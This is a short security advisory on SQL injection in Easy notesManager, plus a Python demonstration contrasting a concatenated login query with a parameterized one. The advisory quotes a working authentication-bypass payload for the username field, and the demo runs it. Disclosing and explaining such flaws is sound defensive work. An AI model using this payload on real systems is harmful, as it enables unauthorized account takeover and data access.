source: https://www.securityfocus.com/bid/20803/info

Easy notesManager is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in SQL queries.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Supplying the following to the 'username' field is sufficient to bypass authentication:

dontcare' and 0=1 union select id,login,'0cc175b9c0f1b6a831c399e269772661',grp,salutation,firstname,lastname,email from users where login='superadmin
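
The following is an added example, not code from Easy notesManager or from the advisory: it contrasts a string-concatenated user lookup with a parameterized one, using the 'username' value above as test input. The SQLite stand-in database, the column name "password", the row values and all function names are assumptions made for illustration.

```python
import sqlite3

# Column list taken from the SELECT in the advisory; the name "password" for
# the third column and every row value below are constructed assumptions.
COLUMNS = "id, login, password, grp, salutation, firstname, lastname, email"
STORED_HASH = "ab" * 16  # constructed placeholder for the real stored hash

# The 'username' value quoted in the advisory, used here as test input.
ADVISORY_INPUT = (
    "dontcare' and 0=1 union select id,login,"
    "'0cc175b9c0f1b6a831c399e269772661',grp,salutation,firstname,"
    "lastname,email from users where login='superadmin"
)

def make_db():
    """Build an in-memory stand-in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE users ({COLUMNS})")
    conn.execute(
        "INSERT INTO users VALUES (1, 'superadmin', ?, 'admin', 'Mr', "
        "'Sam', 'Root', 'root@example.test')",
        (STORED_HASH,),
    )
    return conn

def lookup_concatenated(conn, username):
    """Vulnerable pattern: the input becomes part of the SQL text, so a quote
    inside it closes the string literal and the remainder is parsed as SQL."""
    sql = f"SELECT {COLUMNS} FROM users WHERE login='{username}'"
    return conn.execute(sql).fetchone()

def lookup_parameterized(conn, username):
    """Hardened form: the input is bound as a value and never parsed as SQL."""
    sql = f"SELECT {COLUMNS} FROM users WHERE login=?"
    return conn.execute(sql, (username,)).fetchone()

if __name__ == "__main__":
    conn = make_db()
    forged = lookup_concatenated(conn, ADVISORY_INPUT)
    # The row names superadmin, but its hash column came from the request.
    print("concatenated :", forged[1], forged[2] == STORED_HASH)
    print("parameterized:", lookup_parameterized(conn, ADVISORY_INPUT))
```

With the concatenated query, the returned row carries a hash value supplied in the request instead of the stored one; with the bound parameter the same input matches no login and returns no row.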